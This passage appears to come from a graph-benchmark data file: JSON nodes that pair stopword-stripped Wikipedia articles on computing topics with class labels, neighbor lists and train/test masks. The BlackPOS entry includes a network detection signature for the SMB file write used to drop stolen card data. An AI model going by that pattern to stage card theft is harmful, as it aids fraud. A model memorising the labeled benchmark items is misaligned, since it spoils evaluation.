3.0 specification formation object database technology working group odbt wg odbt wg planned create set standards would incorporate advances object database technology e.g. replication data management e.g. spatial indexing data formats e.g. xml include new features standards support domains object databases adopted e.g. real-time systems work odbt wg suspended march 2009 subsequent economic turmoil late 2008 odb vendors involved effort decided focus resources elsewhere january 2007 world wide web consortium gave final recommendation status xquery language xquery uses xml data model ideas developed originally object databases found way xquery xquery intrinsically object-oriented popularity xml xquery engines compete object databases vehicle storage data complex variable hold conveniently relational database xquery also allows modules written provide encapsulation features provided object-oriented systems xquery v1 xpath v2 extremely complex foss software implementing standards 10 years publication compared xpath v1 xslt v1 xml fit community demands open format since early 2000s json gained community adoption popularity applications surpassing xml 2010s jsoniq query-analog xquery json sharing xquery core expressions operations demonstrated functional equivalence json xml formats context main strategy oodbms maintainers retrofit json databases using internal data type january 2016 postgresql 9.5 release first foss oodbms offer efficient json internal datatype jsonb complete set functions operations basic relational non-relational manipulations object database stores complex data relationships data directly without mapping relational rows columns makes suitable applications dealing complex data objects many-to-many relationship accessed use pointers pointers linked objects establish relationships another benefit oodbms programmed small procedural differences without affecting entire system",
    "neighbors": [
      5632,
      6153,
      2068,
      5658,
      9245,
      9248,
      10793,
      5677,
      10286,
      4155,
      11324,
      11327,
      70,
      9286,
      2632,
      9290,
      8788,
      10326,
      7767,
      8291,
      9828,
      10340,
      8808,
      2669,
      1136,
      6775,
      1146,
      3196,
      2688,
      10389,
      6809,
      4255,
      1697,
      4263,
      10921,
      10413,
      9397,
      7868,
      11457,
      6850,
      2246,
      6359,
      2780,
      734,
      10470,
      10471,
      4847,
      6383,
      7412,
      6395,
      3323,
      9467,
      4352,
      8979,
      7446,
      11030,
      1307,
      5403,
      10020,
      2344,
      6953,
      1341,
      10048,
      2369,
      5953,
      2901,
      10069,
      11098,
      8539,
      862,
      4960,
      6502,
      8554,
      8559,
      9075,
      9589,
      4477,
      5509,
      8582,
      10632,
      2456,
      9112,
      10137,
      9631,
      9634,
      7076,
      1447,
      7080,
      9147,
      3004,
      6085,
      974,
      2512,
      4056,
      987,
      479,
      4065,
      7650,
      3556,
      6124,
      2544,
      10737,
      502
    ],
    "mask": "None"
  },
  {
    "node_id": 8202,
    "label": 4,
    "text": "Email_authentication:email authentication email authentication validation collection techniques aimed providing verifiable information origin email messages validating domain ownership message transfer agents mta participated transferring possibly modifying message original base internet email simple mail transfer protocol smtp feature forged sender addresses emails practice known email spoofing widely used phishing email spam various types fraud combat large number competing email authentication proposals developed fairly recently three widely adopted – spf dkim dmarc results validation used automated email filtering assist recipients selecting appropriate action article cover user authentication email submission retrieval early 1980s simple mail transfer protocol smtp designed provided real verification sending user system problem email systems run trusted corporations universities since commercialization internet early 1990s spam phishing crimes increasingly involve email email authentication necessary first step towards identifying origin messages thereby making policies laws enforceable hinging domain ownership stance emerged early 2000 implies coarse-grained authentication given domains appear right part email addresses sign fine-grain authentication user level achieved means pretty good privacy s/mime present digital identity needs managed individual smtp defines message transport message content thus defines mail envelope parameters envelope sender header except trace information body message std 10 define smtp envelope std 11 define message header body formally referred internet message format smtp defines trace information message saved header using following two fields mail user agent mua knows outgoing mail smtp server configuration mta relay server typically determines server connect looking mx mail exchange dns resource record recipient domain name path depicted left reconstructed ground trace header fields host adds top header receives message important realize first lines top header usually trusted recipient fact lines written machines recipient administrative management domain admd act upon explicit mandate contrast lines prove involvement b well purported author mua could counterfeit created c. codice_1 field shown epoch-making piece header codice_2 written e mail delivery agent mda based message envelope additional trace fields designed email authentication populate top header normally messages sent author admd go directly destination mx b → figures sender admd add authentication tokens message goes boxes common cases schematized follows spf allows receiver check email claimed come specific domain comes ip address authorized domain administrators usually domain administrator authorize ip addresses used outbound mtas including proxy smarthost ip address sending mta guaranteed valid transmission control protocol establishes connection checking remote host reachable receiving mail server receives codice_3 smtp command soon connection set codice_4 beginning message contain domain name spf verifier queries domain name system dns matching spf record exists specify ip addresses authorized domain administrator result pass fail intermediate result systems generally take account anti-spam filtering dkim checks message content deploying digital signatures rather using digital certificates keys signature-verification distributed via dns way message gets associated domain name dkim-compliant domain administrator generates one pairs asymmetric keys hands private keys signing mta publishes public keys dns dns labels structured codice_5 selector identifies key pair codice_6 fixed keyword followed signing domain name publication occurs authority domain admd injecting message smtp transport system signing mta creates digital signature covers selected fields header body beginning signature cover substantive header fields codice_7 codice_8 codice_9 codice_10 added message header trace field number relays receive forward message every hop signature verified retrieving public key dns long intermediate relays n't modify signed parts message dkim-signatures remain valid dmarc allows specification policy authenticated messages built top two existing mechanisms sender policy framework spf domainkeys identified mail dkim allows administrative owner domain publish policy dns records specify mechanism dkim spf employed sending email domain check codice_7 field presented end users receiver deal failures reporting mechanism actions performed policies range methods proposed either deprecated yet gained widespread support included sender id certified server validation domainkeys adsp allows specification policy messages signed author domain message go dkim authentication first adsp demand punishing treatment message signed author domain —as per codice_7 header field adsp record codice_13 published dns label codice_14 adsp designed domains heavily abused phishing similar fraud may want forgo mail facilities mailing lists non delivery reports happen remain unsigned exchange cut abuse adsp demoted historic november 2013 vbr adds vouch already authenticated identity method requires globally recognized authorities certify reputation domains sender apply reference vouching authority reference accepted published dns branch managed authority vouched sender add codice_15 header field messages sends also add dkim signature use authentication method spf receiver validating sender identity verify vouch claimed codice_15 looking reference applications avoid using method means authentication nevertheless often carried results written codice_1 header field besides tcp information required smtp specification ip reverse confirmed looking ip address name found indication ip set properly dns reverse resolution range ip addresses delegated admd uses remain managed network provider latter case useful identity related message obtained rfc 8601 defines trace header field codice_18 receiver record results email authentication checks carried multiple results multiple methods reported field separated semicolons wrapped appropriate example following field purportedly written codice_19 reports spf dkim results first token field name codice_19 id authentication server token known authserv-id receiver supporting rfc 8601 responsible remove rename false header claiming belong domain downstream filters get confused however filters still need configured know identities domain may use mail user agent mua slightly harder learn identities trust since users receive email multiple domains—e.g. multiple email addresses -— domains could let codice_18 fields pass looked neutral way malicious sender forge authserv-id user would trust message arrived different domain legitimate codice_18 typically appears codice_1 field domain message relayed additional codice_1 fields may appear top header message got transferred internally servers belonging trusted admd internet assigned numbers authority maintains registry email authentication parameters parameters need registered though example local policy values designed site internal use correspond local configuration need registration hand header field meant report results based data already present message data retrieved third parties global reputation systems compliant rfc 7601 example attempt register add dnswl results field rejected basis",
    "neighbors": [
      1667,
      7044,
      8332,
      7949,
      1297,
      914,
      8337,
      5012,
      10263,
      8093,
      2848,
      8224,
      10275,
      11046,
      8747,
      10924,
      5421,
      4272,
      9909,
      182,
      10167,
      4793,
      5433,
      9532,
      1086,
      8130,
      4163,
      2887,
      10696,
      3145,
      4945,
      1495,
      3032,
      8283,
      9053,
      2527,
      1125,
      4453,
      6762,
      1899,
      5621,
      6517,
      1658
    ],
    "mask": "Test"
  },
  {
    "node_id": 8203,
    "label": 8,
    "text": "Web_Services_Discovery:web services discovery web services discovery provides access software systems internet using standard protocols basic scenario web service provider publishes service web service consumer uses service web service discovery process finding suitable web services given task publishing web service involves creating software artifact making accessible potential consumers web service providers augment service endpoint interface interface description using web services description language wsdl consumer use service universal description discovery integration uddi xml-based registry business internet services provider explicitly register service web services registry uddi publish additional documents intended facilitate discovery web services inspection language wsil documents service users consumers search web services manually automatically implementation uddi servers wsil engines provide simple search apis web-based gui help find web services web services may also discovered using multicast mechanisms like ws-discovery thus reducing need centralized registries smaller networks current uddi search mechanism focus single search criterion business name business location business category service type name business identifier discovery url fact business solution normal search multiple uddi registries wsil documents aggregate returned result using filtering ranking techniques ibm modularized federated web services discovery engine 2001 released technology ibm business explorer web services be4ws universal description discovery integration uddi pronounced platform-independent extensible markup language protocol includes xml-based registry businesses worldwide list internet mechanism register locate web service applications uddi open industry initiative sponsored organization advancement structured information standards oasis enabling businesses publish service listings discover define services software applications interact internet uddi originally proposed core web service standard designed interrogated soap messages provide access web services description language wsdl documents describing protocol bindings message formats required interact web services listed directory uddi written august 2000 time authors vision world consumers web services would linked providers public private dynamic brokerage system vision anyone needing service credit card authentication would go service broker select service supporting desired soap service interface meeting criteria world publicly operated uddi node broker would critical everyone consumer public open brokers would return services listed public discovery others service producer getting good placement brokerage—by relying metadata authoritative index categories—would critical effective placement uddi included web services interoperability ws-i standard central pillar web services infrastructure uddi specifications supported publicly accessible universal business registry naming system built around uddi-driven service broker uddi widely adopted designers hoped ibm microsoft sap announced closing public uddi nodes january 2006 group defining uddi oasis universal description discovery integration uddi specification technical committee voted complete work late 2007 closed september 2010 microsoft announced removing uddi services future versions windows server operating system instead capability would moved biztalk server 2013 microsoft announced deprecation uddi services biztalk server 2016 microsoft remove uddi services biztalk server uddi systems commonly found inside companies used dynamically bind client systems implementations however much search metadata permitted uddi used relatively simple role uddi business registration consists three components white pages give information business supplying service includes name business description business potentially multiple languages using information possible find service information already known example locating service based provider name contact information business also provided example businesses address phone number information dun bradstreet yellow pages provide classification service business based standard taxonomies include standard industrial classification sic north american industry classification system naics united nations standard products services code unspsc geographic taxonomies single business may provide number services may several yellow pages describing service associated one white page giving general information business green pages used describe access web service information service bindings information related web service address service parameters references specifications interfaces information related directly web service includes e-mail ftp corba telephone details service web service may multiple bindings defined wsdl description service may multiple green pages binding need accessed differently uddi nodes servers support uddi specification belong uddi registry uddi registries collections one nodes soap xml-based protocol exchange messages requester provider web service provider publishes wsdl uddi requester join using soap",
    "neighbors": [
      7364,
      2501,
      8070,
      10020,
      425,
      4107,
      10829,
      8208,
      4979,
      7320,
      5433,
      3323,
      2013,
      7198,
      4959
    ],
    "mask": "None"
  },
  {
    "node_id": 8204,
    "label": 5,
    "text": "WHOIS:whois whois pronounced phrase query response protocol widely used querying databases store registered users assignees internet resource domain name ip address block autonomous system also used wider range information protocol stores delivers database content human-readable format current iteration whois protocol drafted internet society documented elizabeth feinler team created resource directory arpanet responsible creating first whois directory early 1970s feinler set server stanford network information center nic acted directory could retrieve relevant information people entities team created domains feinler suggestion domains divided categories based physical address computer process registration established nowiki rfc 920 /nowiki whois standardized early 1980s look domains people resources related domain number registrations registration done one organization time one centralized server used whois queries made looking information easy time emergence internet arpanet organization handled domain registrations defense advanced research projects agency darpa united states government created 1958 responsibility domain registration remained darpa arpanet became internet 1980s uunet began offering domain registration service however simply handled paperwork forwarded darpa network information center nic national science foundation directed management internet domain registration would handled commercial third-party entities internic formed 1993 contract nsf consisting network solutions inc. general atomics general atomics contract canceled several years due performance issues 20th century whois servers highly permissive would allow wild-card searches whois query person last name would yield individuals name query given keyword returned registered domains containing keyword query given administrative contact returned domains administrator associated since advent commercialized internet multiple registrars unethical spammers permissive searching longer available december 1 1999 management top-level domains tlds com net org assigned icann time tlds converted thin whois model existing whois clients stopped working time month later self-detecting common gateway interface support program could operate web-based whois lookup external tld table support multiple whois servers based tld request eventually became model modern whois client 2005 many generic top-level domains early 1980s also many country-code top-level domains led complex network domain name registrars registrar associations especially management internet infrastructure become internationalized performing whois query domain requires knowing correct authoritative whois server use tools whois proxy searches become common 2003 ietf committee formed create new standard looking information domain names network numbers cross registry information service protocol crisp january 2005 july 2006 working name proposed new standard internet registry information service iris initial ietf proposed standards rfcs iris status rfcs group worked found ietf tools site march 2009 crisp ietf working group concluded final rfc 5144 published group note ietf crisp working group confused number resource organization nro team name consolidated rir iana stewardship proposal team crisp team 2013 ietf acknowledged iris successful replacement whois primary technical reason appeared complexity iris non-technical reasons deemed lie areas upon ietf pass judgment meanwhile arin ripe ncc managed serve whois data via restful web services charter drafted february 2012 provided separate specifications number registries first name registries follow working group produced five proposed standard documents informational document whois protocol origin arpanet nicname protocol based name/finger protocol described nowiki rfc 742 /nowiki 1977 nicname/whois protocol first described nowiki rfc 812 /nowiki 1982 ken harrenstien vic white network information center sri international whois originally implemented network control program ncp found major use tcp/ip suite standardized across arpanet later internet protocol specification following original quote command line server query normally single name specification i.e name resource however servers accept query consisting question mark return description acceptable command line formats substitution wild-card formats also exist e.g. appending full-stop period query name returns entries beginning query name modern internet whois services typically communicated using transmission control protocol tcp servers listen requests well-known port number 43 clients simple applications establish communications channel server transmit text record name resource queried await response form sequence text records found database simplicity protocol also permits application command line interface user query whois server using telnet protocol 2014 june icann published recommendation status codes extensible provisioning protocol epp domain status codes whois lookups traditionally performed command line interface application many alternative web-based tools exist whois sister protocol called referral whois rwhois whois database consists set text records resource text records consists various items information resource associated information assignees registrants administrative information creation expiration dates two data models exist storing resource information whois database thick thin model whois information stored looked according either thick thin data model thick model usually ensures consistent data slightly faster queries since one whois server needs contacted registrar goes business thick registry contains important information registrant entered correct data privacy features used obscure data registration information retained thin registry contact information might available could difficult rightful registrant retain control domain whois client understand deal situation would display full information registrar unfortunately whois protocol standard determining distinguish thin model thick model specific details records stored vary among domain name registries top-level domains including com net operate thin whois requiring domain registrars maintain customers data global top-level registries including org operate thick model country-code top-level registry national rules first applications written whois information system command-line interface tools unix unix-like operating systems i.e solaris linux etc. whois client server software distributed free open-source software binary distributions included unix-like systems various commercial unix implementations may use proprietary implementation example solaris 7 whois command line client passes phrase given argument directly whois server various free open source examples still found sites sourceforge.net however modern whois tools implement command line flags options -h option access specific server host default servers preconfigured additional options may allow control port number connect displaying additional debugging data changing recursion/referral behavior like tcp/ip client-server applications whois client takes user input opens internet socket destination server whois protocol manages transmission query reception results advent world wide web especially loosening network solutions monopoly looking whois information via web become quite common present popular web-based whois-queries may conducted arin ripe apnic early web-based whois clients merely front-ends command-line client resulting output gets displayed web page little clean-up formatting currently web based whois clients usually perform whois queries directly format results display many clients proprietary authored domain name registrars need web-based clients came fact command-line whois clients largely existed unix large computing worlds microsoft windows macintosh computers whois clients installed default registrars find way provide access whois data potential customers many end-users still rely clients even though command line graphical clients exist home pc platforms microsoft provides sysinternals suite includes whois client cost also many sites owned registrars internet-related companies support main tld remain free web-based whois sites incomplete support tld ip search cpan several perl modules available work whois servers many current fully function current 2005 whois server infrastructure however still much useful functionality derive including looking numbers registrant contacts whois servers operated regional internet registries rir queried directly determine internet service provider responsible particular resource records registries cross-referenced query arin record belongs ripe return placeholder pointing ripe whois server lets whois user making query know detailed information resides ripe server addition rirs servers commercial services exist routing assets database used large networks e.g. large internet providers acquired isps several rir areas currently standard determining responsible whois server dns domain though number methods common use top-level domains tlds whois lookups require searching procuring domain registrar display domain owner details normally contact information resources assignee returned however registrars offer private registration case contact information registrar shown instead registry operators wholesalers meaning typically provide domain name services large number retail registrars turn offer consumers private registration identity wholesale registrar may returned case identity individual well retail registrar may hidden example whois data returned individual resource holder result whois query example.com referral whois rwhois extension original whois protocol service rwhois extends concepts whois scalable hierarchical fashion potentially creating system tree-like architecture queries deterministically routed servers based hierarchical labels reducing query primary repository information lookups ip address allocations often limited larger classless inter-domain routing cidr blocks e.g. /24 /22 /16 usually regional internet registries rirs domain registrars run rwhois whois servers although rwhois intended run even smaller local internet registries provide granular information ip address assignment rwhois intended replace whois providing organized hierarchy referral services one could connect rwhois server request look-up automatically re-directed correct server however technical functionality place adoption rwhois standard weak rwhois services typically communicated using transmission control protocol tcp servers listen requests well-known port number 4321 rwhois first specified nowiki rfc 1714 /nowiki 1994 network solutions specification superseded 1997 rfc 2167 referral features rwhois different feature whois server refer responses another server rwhois also implements one criticism whois lack full access data parties realtime access complete databases others cite competing goal domain privacy criticism although problem strongly mitigated domain privacy services currently internet corporation assigned names numbers icann broadly requires mailing address phone number e-mail address owning administrating domain name made publicly available whois directories registrant domain owner contact details address telephone number easily accessible anyone queries whois server however policy enables spammers direct marketers identity thieves attackers loot directory personal information people although icann exploring changing whois enable greater privacy lack consensus among major stakeholders type change made domain registrars offer private registrations also known domain privacy contact information registrar shown instead customer offer private registration many registrars risk mitigated studies shown spammers harvest plain-text email addresses whois servers reason whois servers websites offering whois queries implemented rate-limiting systems web-based captcha limited amounts search queries per user ip address whois requirements conflict general data protection regulation gdpr effective european union 25 may 2018 places strict regulations processing publication personally identifiable information icann stated november 2017 would reprimand noncompliance contractual obligations related handling registration data registrars provide alternative solutions compliance rules whois requirements updated take gdpr account whois protocol written international audience mind whois server and/or client determine text encoding effect query database content many servers originally using us-ascii internationalization concerns n't taken consideration much later might impact usability usefulness whois protocol countries outside usa case internationalized domain names responsibility client application perform translation domain name native language script dns name punycode cases registrant domain owner identity public anyone easily confirm status domain via whois case private registrations ascertaining registration information may difficult registrant acquired domain name wants verify registrar completed registration process three steps may required provides confidence retailer actually registered name registrar goes business failure registerfly 2007 rightful domain holder privacy-protected registrations may difficulty regaining administration his/her domain name registrants using private registration attempt protect using registrar places customer data escrow third party icann requires every registrant domain name given opportunity correct inaccurate contact data associated his/her domain reason registrars required periodically send holder contact information record verification provide guarantee accuracy information registrant provided inaccurate information whois generated policy issues united states federal government noted whois creates privacy issue also tied free speech anonymity however whois important tool law enforcement officers investigating violations like spam phishing track holders domain names result law enforcement agencies sought make whois records open verified expert working group ewg internet corporation assigned names numbers icann recommended 24 june 2013 whois scrapped recommends whois replaced system keeps information secret internet users discloses information permissible purposes icann list permissible purposes includes domain-name research domain-name sale purchase regulatory enforcement personal data protection legal actions abuse mitigation although whois key tool journalists determining disseminating certain information internet use whois free press included icann ’ proposed list permissible purposes ewg collected public input initial report 13 september 2013 final report issued 6 june 2014 without meaningful changes recommendations icann process re-inventing whois working icann whois beta",
    "neighbors": [
      7298,
      1796,
      517,
      8582,
      519,
      6797,
      10104,
      5397,
      10017,
      2090,
      10872,
      9901,
      10924,
      7983,
      4272,
      2485,
      6710,
      5818,
      8386,
      2887,
      11464,
      3145,
      1996,
      7117,
      10446,
      6993,
      2901,
      6229,
      6103,
      7802,
      11607,
      5469,
      11391,
      10727,
      11112,
      1129,
      106,
      2281,
      10609,
      1268,
      5492,
      1526,
      119,
      8309,
      762,
      3967
    ],
    "mask": "None"
  },
  {
    "node_id": 8205,
    "label": 4,
    "text": "Hao123:hao123 hao123 online listings portal baidu.. portuguese thai version hao123 accused internet hijacking installing virus inserts hao123 onto desktop malicious browser hijacker often installs without user consent installed difficult remove hao123 uses windows service registry browser parameters modify browser default setting prevent removed uninstalled adding back windows service also sniffs user internet traffic illegally forces users visit website improve website traffic ranking reason hao123 considered malware many anti-virus programs",
    "neighbors": [
      7515
    ],
    "mask": "None"
  },
  {
    "node_id": 8206,
    "label": 4,
    "text": "BlackPOS_Malware:blackpos malware blackpos interprocess communication hook malware type point-of-sale malware spyware program specifically designed installed point sale pos system scrape data debit credit cards different normal memory-scraping malware scrapes data needs filters extract target data specifically hooks track information thus called interprocess communication hook malware gets installed looks pos.exe file system parses content track 1 track 2 financial card data scraped data encoded base64 algorithm stored magnetic strip back card encoded data moved second machine smb blackpos malware involved target corporation data breach 2013 blackpos program first surfaced early 2013 affected many australian american canadian companies target marcus neiman incorporated point-of-sale systems companies virus also known 'reedum 'kaptoxa originally created 23 year-old rinat shabayev later developed 17-year-old sergey taraspov better known online name 'ree4 original version blackpos sold online black market forums taraspov around 2000 became cheaper readily available source code malware leaked onto web blackpos infects computers running windows operating systems credit card readers connected part pos system pos system computers easily infected date operating systems antivirus programs prevent security breaches computer database systems weak administration login credentials blackpos standard memory-scraping malware exception virus limited pos.exe files infected pos system desired pos system infected malware pinpoints process corresponded card reader steals payment card track 1 track 2 data information stored magnetic strip payment cards system memory stolen information cloned onto blank credit cards sold black market use used personal reasons results consumer personal information compromised usable anyone access information unlike pos malware vskimmer blackpos offline data extraction method captured information uploaded remote server online makes easier hackers need proximity infected systems retrieve consumer information furthermore hackers may try hide virus detection programming blackpos send stolen information certain time frames mask traffic information creates normal work hours making seem nothing suspicious going blackpos used steal customer information businesses worldwide well-known attack occurred back 2013 mega-store chain target thanksgiving break november 2013 target pos system infected blackpos malware mid-december mega-store became aware breach security hackers able get target systems compromising company web server uploading blackpos software target pos systems result attack 40 million customer credit debit card information 70 million addresses phone numbers names personal information stolen mainframes end 1800 u.s. target stores affected malware attack target however business affected software neiman marcus another well-known retailer affected well computer database said infected early july 2013 fully contained january 2014 breach believed involve 1.1 million credit debit cards span several months although credit debit card information compromised neiman marcus issued statement saying social security numbers birthdates affected among things companies ups wendy home depot also claimed affected blackpos well although reports state breaches caused malware virus two ways detect blackpos activity pos systems based malware works first strategy detect blackpos uses fact first 15 characters stolen track data always consists digits result limited amount combinations produced means predictable pattern followed addition encoding outputs 000 999 result string always begin “ m1 ” “ mf ” “ mh ” “ ml ” “ t1 ” “ tf ” “ th ” “ tl ” “ sh ” “ sl ” second way identify blackpos network activity dropping file specific location using fixed filename format example given security intelligence checks file path name matches format written \\windows\\twain_32\\*_*_*_*.txt strategy demonstrated following opensignature rule alert tcp 445 msg kaptoxa file write detected flow to_server established content smb|a2| content \\\\|00|w|00|i|00|n|00|d|00|o|00|w|00|s|00|\\\\|00|t|00|w|00|a|00|i|00|n|00|_|00|3|00|2|00|\\\\ pcre /.*_.*_.*_ *\\.|00|t|00|x|00|t/ sid:1 prevention according pci security council businesses keep malware prevention software updated frequently lower chance infection addition system logs regularly checked irregular activity within servers well monitoring large data files sent unknown sources companies also require login credentials updated regularly provide instructions create safer secure passwords",
    "neighbors": [
      10309,
      6091,
      6797,
      6360,
      9242,
      7515,
      10364,
      10392
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8207,
    "label": 2,
    "text": "UniSoft:unisoft unisoft corporation american software developer established 1981 originally focused development unix ports various computer architectures based millbrae california builds standardization conformance testing applications digital television market unisoft founded october 5 1981 emeryville california original business unix development soon recognized one early implementers unix emerging 16-bit microcomputer market 1989 completed 225 unix implementations various hardware platforms estimated 65 ports unisoft port version 7 unix first operating system sun microsystems sun-1 workstations servers also developed apple inc. unix variant a/ux apple macintosh ii 1991 company moved current offices millbrae california unisoft shifted focus television industry 1997 order address standards compliant software market works solely development testing broadcast tools digital television",
    "neighbors": [
      9665,
      9444,
      4741,
      10436,
      6760,
      3241,
      9932,
      1809,
      5492
    ],
    "mask": "None"
  },
  {
    "node_id": 8208,
    "label": 8,
    "text": "Web_Services_Inspection_Language:web services inspection language ws-inspection web service specification discovery documents developed joint effort microsoft ibm ws-inspection lists groups web services endpoints xml format currently standards used purpose microsoft disco expected ws-inspection eventually replace standards become universally accepted discovery standard web services",
    "neighbors": [
      10020,
      8203,
      119,
      3323,
      479
    ],
    "mask": "None"
  },
  {
    "node_id": 8209,
    "label": 2,
    "text": "Kurumin:kurumin kurumin linux live cd operating system based debian main features advanced hardware auto-detection inherited knoppix portuguese user interface main goal ease use release 7.0 size disk image approximately 603 mb version ng 8.06 based ubuntu 8.04 released june 24 2008 discontinued january 29 2009 name comes tupi word kurumi means boy usage letter k instead usual portuguese spelling curumi curumim brings line kde kurumin default desktop environment well knoppix late 2007 morimoto said project would halted scope reduced november 2008 project officially discontinued distribution sports open-source control center named clicaaki roughly clickhere features series shell scripts kommander-based panels magic icons install software included live cd icons one configure wide range networking options control center also provides access synaptic package manager clicaaki control panel shortcuts scripts also perform tasks like downloading installing free games apps divided categories short description work differences control panel also includes scripts downloading automatically configuring drivers 3d video cards ati nvidia difficult task novice users another feature distro support many winmodems including official packages drivers debian repository also scripts automate tasks compiling configuring necessary modules features kurumin spread gnu/linux operating system brazil level never seen",
    "neighbors": [
      8837,
      7435,
      10127,
      2321,
      5397,
      4887,
      10394,
      673,
      3745,
      10530,
      9253,
      10149,
      11305,
      7854,
      7983,
      2738,
      4790,
      439,
      56,
      59,
      7483,
      3903,
      3649,
      4673,
      2375,
      4039,
      5067,
      8907,
      1110,
      9693,
      2914,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      7020,
      10860,
      7534,
      2671,
      7920,
      8177,
      9074,
      5363,
      9461,
      6393,
      11388,
      8957,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 8210,
    "label": 4,
    "text": "Graph-based_access_control:graph-based access control graph-based access control gbac declarative way define access rights task assignments recipients content information systems access rights granted objects like files documents also business objects like account also used assignment agents tasks workflow environments organizations modeled specific kind semantic graph comprising organizational units roles functions well human automatic agents i.a persons machines compared approaches like role-based access control attribute-based access control main difference gbac access rights defined using organizational query language instead total enumeration foundations gbac go back research project named cocosorg configurable cooperation system english language please see bamberg university cocosorg organization represented semantic graph formal language used specify agents access rights workflow environment within c-org-project hof university institute information systems iisys approach extended features like separation duty access control virtual organizations subject-oriented access control graph-based access control consists two building blocks organizational graph divided type instance level instance level node types organizational units functional units agents basic structure organization defined using called structural relations define part relations functional units organizational units well mapping agents functional units additionally specific relationship types like deputyship informed_by types extended modeler relationships context sensitive usage predicates type level organizational structures described general manner consists organizational unit types functional unit types relationship types instance level type definitions used create new instances reuse organizational knowledge case exceptions reading see gbac query language used define agents certain characteristics abilities following table shows usage query language context access control matrix first query means managers working company six months read financial report well managers classified flag readfinancialreport daily financial report written manager controlling department clerks department enabled writefinancialreport==true gbac first implemented cocos environment within organizational server cocosorg c-org-project extended sophisticated features like separation duty access control distributed environments also cloud-based implementation ibm bluemix platform implementations server takes query client system resolves set agents set sent back calling client response clients file systems database management systems workflow management systems physical security systems even telephone servers",
    "neighbors": [
      1792,
      5573,
      8838,
      9958,
      4912,
      2737,
      210,
      10580,
      7260
    ],
    "mask": "Train"
  },
  {
    "node_id": 8211,
    "label": 5,
    "text": "Point-to-Point_Tunneling_Protocol:point-to-point tunneling protocol point-to-point tunneling protocol pptp obsolete method implementing virtual private networks pptp many well known security issues pptp uses tcp control channel generic routing encapsulation tunnel encapsulate ppp packets many modern vpns use various forms udp functionality pptp specification describe encryption authentication features relies point-to-point protocol tunneled implement security functionalities pptp implementation ships microsoft windows product families implements various levels authentication encryption natively standard features windows pptp stack intended use protocol provide security levels remote access levels comparable typical vpn products specification pptp published july 1999 rfc 2637 developed vendor consortium formed microsoft ascend communications today part nokia 3com others pptp proposed ratified standard internet engineering task force pptp tunnel instantiated communication peer tcp port 1723 tcp connection used initiate manage gre tunnel peer pptp gre packet format non standard including new acknowledgement number field replacing typical routing field gre header however normal gre connection modified gre packets directly encapsulated ip packets seen ip protocol number 47 gre tunnel used carry encapsulated ppp packets allowing tunnelling protocols carried within ppp including ip netbeui ipx microsoft implementation tunneled ppp traffic authenticated pap chap ms-chap v1/v2 pptp subject many security analyses serious security vulnerabilities found protocol known vulnerabilities relate underlying ppp authentication protocols used design mppe protocol well integration mppe ppp authentication session key establishment summary vulnerabilities eap-tls seen superior authentication choice pptp however requires implementation public-key infrastructure client server certificates may viable authentication option remote access installations networks use pptp apply additional security measures deemed completely inappropriate modern internet environment time means negating aforementioned benefits protocol point matter slice using pptp lose-lose scenario",
    "neighbors": [
      10242,
      10271,
      9764,
      2085,
      2087,
      3629,
      562,
      3133,
      5181,
      11332,
      8265,
      4687,
      1618,
      1623,
      2136,
      5721,
      10341,
      9318,
      10344,
      5749,
      9860,
      5254,
      649,
      10889,
      9868,
      6797,
      3218,
      9365,
      11413,
      2206,
      3742,
      9380,
      9381,
      3751,
      3752,
      4268,
      10924,
      10417,
      3250,
      7859,
      2228,
      9909,
      7865,
      4797,
      3777,
      7364,
      11468,
      7376,
      5843,
      6364,
      8432,
      5875,
      3322,
      3847,
      1297,
      10005,
      5402,
      1315,
      5433,
      5437,
      2884,
      2887,
      5959,
      6993,
      11606,
      9048,
      2904,
      6490,
      5469,
      5470,
      5471,
      5472,
      1893,
      8039,
      11112,
      367,
      2431,
      11162,
      5531,
      2996,
      10171,
      3006,
      2509,
      5084,
      10210,
      2027,
      11248,
      9722,
      6651,
      5118
    ],
    "mask": "None"
  },
  {
    "node_id": 8212,
    "label": 1,
    "text": "TippingPoint:tippingpoint trend micro tippingpoint ’ intrusion prevention system ips deals threat protection combining new application-level security practical user awareness inbound/outbound messaging inspection capabilities scalable ngips protects user ’ applications network data new threats tippingpoint ngips protects user ’ network sophisticated attacks tippingpoint functions part trend micro security previously tippingpoint division hp part enterprise security group american software company roots traced back 1999 focused network security products particularly intrusion prevention systems networks tippingpoint acquired 3com corporation 2005 run autonomous security-focused division 2005 2010 april 12 2010 hp completed acquisition 3com september 2011 tippingpoint within hp networking networking division hp transferred hp software division september 2013 hp announced entered next-generation firewall market new line tippingpoint firewalls new line extends tippingpoint existing intrusion prevention system ips appliances traditional stateful packet filtering application control company founded january 1999 name shbang texas co-founders john f. mchale kent savage first chief executive kenneth a. kalinoski business develop sell internet appliances may 1999 company changed name netpliance november released i-opener low-cost computer intended used browsing world wide web 2000 las vegas engineer ken segler discovered method install alternative operating system device 2001 company fined federal trade commission 100,000 sales billing practices 2002 company discontinued operations internet appliance business focus network security products new name tippingpoint ceo savage replaced chairman board mchale mchale stepped 2004 however remained chairman board position filled kip mcclanahan former ceo broadjump january 2005 tippingpoint acquired network equipment company 3com 442 million operating division 3com led james hamilton tippingpoint president later replaced alan kessler 3com acquired computer manufacturer hewlett-packard april 2010 approximately 2.7 billion oct 21 2015 tippingpoint acquired trend micro approximately 300 million",
    "neighbors": [
      3619,
      5636,
      8229,
      1638,
      11100,
      3944,
      5384,
      6765,
      3214,
      9424,
      2258,
      119,
      1304,
      5756,
      127
    ],
    "mask": "None"
  },
  {
    "node_id": 8213,
    "label": 2,
